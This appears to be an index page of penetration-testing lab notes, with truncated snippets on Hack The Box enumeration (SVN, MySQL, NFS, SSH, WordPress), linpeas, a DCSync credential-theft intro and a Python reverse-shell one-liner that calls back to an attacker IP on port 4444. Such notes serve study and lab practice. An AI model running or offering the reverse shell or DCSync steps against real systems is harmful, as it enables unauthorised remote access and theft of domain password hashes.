Host entries: 10.10.11.202 sequel.htb dc.sequel.htb If Active Directory => NTP Synchronization with the domain controller. Content SMB Enumeration MSSQL Server Procedures Searching MSS...

DCSync Attack Another way to achieve persistence in an Active Directory infrastructure is to steal the password hashes for all administrative users in the domain. To do this, we could move lateral...

Enumeration commands svn ls svn://10.10.10.203 #list svn log svn://10.10.10.203 #Commit history svn checkout svn://10.10.10.203 #Download the repository svn up -r 2 #Go to revision 2 inside the ch...

Connection Common command to connect MariaDB and MySQL databases (avoid -p if you want to be prompted for the password): mysql -h 10.129.5.43 -u root -p 'th1s!smypassw0rd' MySQL Basic Commands: ...

Default paths: index.php license.txt contains useful information such as the version WordPress installed. wp-activate.php is used for the email activation process when setting up a new WordP...

LinPeas We can use linpeas on UNIX derivatives such as Linux. ./linpeas.sh | tee output.txt Unix_privesc_check We can use unix_privesc_check on UNIX derivatives such as Linux. The script support...

Find recursively a string: # Find ETSCTF on every file under the current directory find . -type f -exec grep -H 'ETSCTF' {} \; 2>/dev/null # Identify any file (not directory) modified in the las...

Enumeration Cipher Algorithms supported: nmap -p22 10.10.1.3 --script ssh2-enum-algos Public key from ssh server: nmap -p22 10.10.1.3 --script ssh-hostkey --script-args= ssh_hostkey=full Review i...

NMAP Scan port and info on NFS nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.181.201 ... 111/tcp open rpcbind | nfs-showmount: |_ /var * | nfs-statfs: | Filesystem 1K-blocks Us...

Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.175",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),...